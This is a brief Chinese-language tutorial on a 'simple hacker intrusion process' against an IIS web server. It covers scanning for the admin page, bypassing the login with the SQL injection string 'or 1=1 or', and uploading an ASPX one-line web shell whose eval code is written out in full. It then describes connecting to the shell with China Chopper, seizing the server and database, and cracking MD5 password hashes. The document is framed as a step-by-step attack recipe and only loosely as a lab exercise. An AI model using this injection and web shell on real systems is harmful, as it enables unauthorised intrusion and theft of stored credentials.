简单的黑客入侵流程

黑客入侵流程"/>

简单的黑客入侵流程

在windows上部署一个IIS web服务器

注意将程疗池使用net 4.0并开启net服务（可能需要手动打开）

web扫描

御剑工具，输入扫描的域名即可出来后台网址

网站的后台绕过

在用户栏输入’or 1=1 or’即可直接不用密码登陆进入后台

上传木马程序

1、新建文本文档，将文件后缀修改为 aspx，书写内容如下：
‹%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>
2、上传之前创建的aspx一句话木马文件

中国菜单

接着上文
1、设法获得上传文件在网站目录中的文件名称和路径。
2、利用中国菜刀工具连接一句话木马(密码为 pass)。

3、获得目标服务器的操作权限并拿到数据库文件。


4.复制password 内容，去MD5解密